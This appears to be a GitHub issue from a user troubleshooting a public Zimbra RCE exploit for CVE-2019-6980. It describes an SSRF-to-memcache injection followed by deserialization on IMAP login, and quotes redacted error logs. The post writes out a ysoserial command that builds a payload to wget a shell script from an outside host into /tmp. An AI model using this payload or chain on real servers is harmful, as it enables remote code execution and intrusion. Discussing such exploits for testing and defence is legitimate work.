Deserialization error in the Zimbra_Deserialization_RCE_CVE-2019-6980.py #6
Description
Good morning,
I have tested CVE-2019-6980 on Zimbra version 8.7.10 & 8.7.11 (Free edition) with the latest ysoserial package version 0.0.6.
For both cases, there are some errors observed from the mailbox.log shown below:
com.zimbra.common.service.ServiceException: system failure: Failed to deserialize ImapFolder
xxxxxxx
xxxxxxxxxxxx
Caused by: java.io,InvalidClassException: org.mozillla.javascript.ScriptableObject: local class incompatible: stream classdesc serVersionUID=xxxxxxxxxxxxxxx, local class serialVersionUID=-xxxxxxxxxxxxxxxxx
xxxxxxxx
xxxxxxxx
From my observation, the zImap entry was successfully inserted into the memcache (Verified) through SSRF, and deserialization occurred when the imap account was logged on (with select inbox, correct folderNo, modseq & uidvalidity).
MozillaRhino2 payload was used in ysoserial to generate the payload (java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget http://1.2.3.4/test.sh --no-check-certificate -O /tmp/test.sh"). I also tested with MozillaRhino1 but it failed too.
Can advise what did i do wrong here?
What is the exact zimbra version and ysoserial that u have tested with? Thank you very much